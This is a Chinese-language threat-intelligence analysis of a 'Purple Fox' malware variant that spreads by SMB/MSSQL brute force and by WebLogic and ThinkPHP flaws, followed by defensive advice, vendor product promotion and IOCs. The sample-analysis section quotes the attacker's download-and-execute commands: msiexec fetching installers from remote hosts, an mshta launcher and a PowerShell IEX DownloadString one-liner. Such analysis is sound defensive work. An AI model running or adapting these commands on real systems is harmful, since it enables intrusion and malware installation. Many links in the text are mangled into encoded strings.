一、背景

腾讯安全威胁情报中心检测到“紫狐”病毒最新变种，该变种通过SMB和MSSQL弱口令爆破攻击传播，同时还会利用Weblogic和ThinkPHP等服务器组件的远程代码执行漏洞进行攻击传播，使该病毒家族的传播能力再次增强，该病毒家族最终通过控制肉鸡电脑刷量、推广安装用户不需要的软件来获利。

紫狐病毒家族最先出现在2018年，最初通过木马下载器进行传播，一直活跃至今。随后又通过刷量软件进行传播（详见：御见威胁情报中心在9月份披露的刷量软件“流量宝流量版”通过挂马攻击传播“紫狐”病毒事件）。新病毒变种通过PendingFileRenameOperations机制替换系统文件实现开机启动，释放安装驱动程序对木马进行保护，有较强的持久化攻击能力。

“紫狐“病毒近期攻击趋势如下：

二、样本分析

从45dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0t1H3y4#2)9J5k6e0p5@1z5q4)9J5k6e0R3$3i4K6u0W2x3U0b7^5i4K6y4m8x3e0M7&6y4o6q4Q4x3V1j5H3c8e0t1K6x3K6g2r3c8p5x3I4y4K6c8p5b7U0c8q4b7V1g2o6c8U0M7%4x3e0R3@1b7@1u0r3z5o6M7H3y4W2)9J5k6h3#2G2k6b7`.`.

下载得到样本(md5: 372c265d58089533dae5b42c2e94078b)实际上是MSI安装包，木马安装包MSI包含3个文件，一个非PE文件（加密的PE文件），另外两个分别是32位和64位的木马DLL，病毒仍然通过系统PendingFileRenameOperations机制替换系统文件实现开机启动。

msi安装后系统提示重启计算机。

重启系统后释放文件C:\Windows\AppPatch\Ke971119.xsl，解密得到木马DLL C:\Windows\System32\Ms6E6AA944App.dll

然后尝试通过写入注册表将木马DLL安装为服务。

HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Ms6E6AA944AppBak\Parameters\ServiceDll C:\Windows\System32\Ms6E6AA944App.dll。

Ms6E6AA944App.dll解密驱动，安装系统回调Cmpcallback。

驱动安装文件过滤系统保护木马。

将shellcode注入svchost.exe，针对本机同网段的随机IP地址扫描445端口，1433端口，然后针对开放端口的机器发起SMB爆破和MSSQL爆破攻击。

爆破时使用内置的IP列表，密码字典如下：

SMB爆破成功后利用smbexec执行命令：

Cmd /c for /d %i in (110.14.163.112:10668 207.148.86.248:17941 45.32.64.219:17022) do Msiexec /i 6edK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4h3W2Q4x3V1j5%4x3V1q4r3c8o6c8m8b7U0m8o6b7U0S2n7x3o6b7#2x3@1x3K6c8e0V1H3c8e0M7&6x3o6y4p5z5e0x3I4y4g2)9J5k6h3#2G2k6b7`.`. /Q

MsSQL爆破成功后通过“cmdexec”执行shell命令：

"C:/Windows/system32/cmd.exe" /c mshta vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (221.139.50.136:12900 91.90.195.15:13446 207.148.86.248:17941) do Msiexec /i afdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9J5y4h3W2Q4x3V1j5$3x3f1u0r3x3f1f1#2z5e0c8m8b7V1f1K6b7U0b7$3b7U0p5I4x3f1t1I4b7e0y4o6z5o6u0o6b7f1k6q4b7g2)9J5k6h3#2G2k6b7`.`. /Q",0)(window.close)

MsSQL爆破时还会通过Powershell运行Sqlexec，然后将命令作为参数ExeArgs传入执行：

C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(1c1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0S2N6$3y4V1L8W2)9J5k6h3N6A6N6r3S2S2j5$3E0Q4x3X3g2U0L8$3#2Q4x3V1j5J5z5o6x3H3z5q4)9J5c8U0t1#2y4W2)9J5c8U0x3^5z5o6b7%4x3U0f1^5y4X3x3^5j5h3g2V1x3e0j5%4y4K6f1J5k6U0j5I4y4K6c8W2y4$3c8W2y4o6t1$3y4U0m8T1y4U0R3#2y4e0q4Q4x3V1k6e0M7h3I4W2P5r3g2U0i4K6u0r3M7r3g2Q4x3X3g2B7M7r3N6Q4x3U0W2Q4x3@1u0u0L8Y4k6G2K9$3g2Q4x3X3c8d9k6h3k6D9k6h3y4@1K9i4k6W2f1p5g2u0L8X3A6W2j5%4c8A6L8$3&6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1f1p5g2g2M7X3I4Q4x3U0k6F1j5Y4y4H3i4K6y4n7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0S2N6$3y4V1L8W2)9J5k6h3N6A6N6r3S2S2j5$3E0Q4x3X3g2U0L8$3#2Q4x3V1j5J5z5o6x3H3z5q4)9J5c8U0t1#2y4W2)9J5c8U0x3^5z5o6b7%4x3U0f1^5y4X3x3^5j5h3g2V1x3e0j5%4y4K6f1J5k6U0j5I4y4K6c8W2y4$3c8W2y4o6t1$3y4U0m8T1y4U0R3#2y4e0q4Q4x3V1k6e0M7h3I4W2P5r3g2U0i4K6u0r3x3e0f1H3y4e0p5$3y4q4)9J5k6h3A6H3k6#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3X3c8q4P5r3g2m8M7X3N6K6i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5c8V1y4E0k6q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6U0i4K6t1$3L8X3u0K6M7q4)9K6b7X3k6G2M7W2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1k6V1i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4h3W2Q4x3U0k6F1j5Y4y4H3i4K6y4n7K9h3&6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1^5x3U0p5^5i4K6u0W2x3U0x3%4i4K6u0W2x3e0t1H3i4K6u0W2x3U0f1J5i4K6y4m8x3e0R3H3y4K6q4Q4x3U0k6F1j5Y4y4H3i4K6y4n7x3U0l9%4i4K6u0W2x3e0b7^5i4K6u0W2z5o6k6Q4x3X3f1J5y4o6S2Q4x3@1p5I4y4K6V1@1x3g2)9J5y4X3&6T1M7%4m8Q4x3@1t1I4y4U0N6Q4x3X3f1I4y4K6W2Q4x3X3f1I4x3o6g2Q4x3X3f1K6x3q4)9K6b7e0p5^5y4K6b7#2i4K6t1&6i4K6t1$3L8X3u0K6M7q4)9K6b7X3c8G2i4K6t1$3L8X3u0K6M7q4)9K6b7V1#2K6K9h3g2^5k6h3y4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0r3K9g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Z5N6s2c8H3i4K6y4m8i4K6u0r3i4K6u0r3i4K6t1#2K9g2)9J5c8U0j5I4b7V1j5I4c8e0f1&6y4p5q4n7c8e0y4n7y4o6k6n7x3e0p5I4b7U0q4m8x3@1x3^5x3V1y4m8c8V1g2m8i4K6u0W2L8h3!0W2

在全局启动目录下写入1.hta脚本文件进行木马下载。

分析发现，紫狐病毒还会利用Weblogic反序列化远程代码执行漏洞（CNVD-C-2019-48814，CVE-2019-2725）进行攻击。由于在反序列化处理输入信息的过程中存在缺陷，未经授权的攻击者可以发送精心构造的恶意 HTTP 请求，利用该漏洞获取服务器权限，实现远程代码执行，漏洞受影响程序版本为OracleWebLogic Server 10.*、Oracle WebLogic Server 12.1.3。

利用ThinkPHP远程命令执行的高危漏洞(CNVD-2018-24942)进行攻击，该漏洞主要因为php代码中route/dispatch模块没有对URL中的恶意命令进行过滤导致，在没有开启强制路由的情况下，能够造成远程命令执行，包括执行shell命令，调用php函数，写入webshell等。主要影响的版本包括 5.x < 5.1.31， 5.x <= 5.0.23。

三、安全建议

1. 建议企业服务器关闭非必须启用的网络端口（如135、139、445），方法可参考：c85K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4N6h3q4F1K9X3W2S2i4K6u0W2M7i4q4Q4x3X3g2U0L8$3#2Q4x3V1k6%4k6h3u0Q4y4h3k6U0L8r3W2F1K9h3y4Q4x3V1k6K6z5q4)9J5c8U0f1^5y4g2)9J5k6h3S2@1L8h3H3`.；

2. 企业内网通过密码安全策略强制使用高强度密码，切勿使用弱口令，切勿一个密码通用于多台服务器，防止黑客暴力破解；

3. 定期对服务器进行加固，尽早修复企业服务器相关组件的安全漏洞，并及时进行漏洞修复；

4. 推荐企业用户使用腾讯T-Sec 网络资产风险检测系统（腾讯御知）全面检测企业网络资产是否受安全漏洞影响。

腾讯T-Sec 网络资产风险检测系统（腾讯御知）是一款自动探测企业网络资产并识别其风险的产品。可全方位监控企业网站、云主机、小程序等资产存在的风险，包含弱口令检测、Web 漏洞扫描、违规敏感内容检测、网站篡改检测、挂马挖矿检测等多类资产风险。

企业用户可扫描以下二维码，免费使用腾讯T-Sec 网络资产风险检测系统（腾讯御知）。

5. 推荐企业用户部署腾讯安全T-Sec高级威胁检测系统（腾讯御界）对黑客攻击行为进行检测。

腾讯安全T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：12bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0L8r3!0#2k6q4)9J5k6i4c8W2L8X3y4W2L8Y4c8Q4x3X3g2U0L8$3#2Q4x3V1k6H3M7X3!0V1N6h3y4@1i4K6u0r3L8Y4c8S2

IOCs

Md5

372c265d58089533dae5b42c2e94078b

URL

http[:]//91.90.195.224:17196/72AFD4AB0CB8B0453C3E90E7903D9315.moe

http[:]//207.148.86.248:17941/72AFD4AB0CB8B0453C3E90E7903D9315.moe

http[:]//23.237.73.2:17648/72AFD4AB0CB8B0453C3E90E7903D9315.moe

http[:]//45.32.64.219:17022/72AFD4AB0CB8B0453C3E90E7903D9315.moe

http[:]//210.59.180.68:19523/72AFD4AB0CB8B0453C3E90E7903D9315.moe

http[:]//207.148.86.248:17941/C2ADDD9840398A1D8CB6CD35C0C50A4C.moe

http[:]//222.161.241.28:18327/C2ADDD9840398A1D8CB6CD35C0C50A4C.moe

http[:]//108.61.207.111:10590/C2ADDD9840398A1D8CB6CD35C0C50A4C.moe

http[:]//207.148.86.248:17941/61BF1E594ABE3B46B111B1A3C82CAFEA.moe

http[:]//36.26.51.86:18265/61BF1E594ABE3B46B111B1A3C82CAFEA.moe

http[:]//58.220.24.52:14805/61BF1E594ABE3B46B111B1A3C82CAFEA.moe

http[:]//45.32.64.219:17022/28C9462EF9857C7BBD244FED7D287E2A.moe

http[:]//139.180.135.16:14099/28C9462EF9857C7BBD244FED7D287E2A.moe

http[:]//207.148.86.248:17941/28C9462EF9857C7BBD244FED7D287E2A.moe

http[:]//221.139.50.136:12900/61BF1E594ABE3B46B111B1A3C82CAFEA.moe

http[:]//91.90.195.15:13446/61BF1E594ABE3B46B111B1A3C82CAFEA.moe

[培训]科锐逆向工程师培训第53期2025年7月8日开班！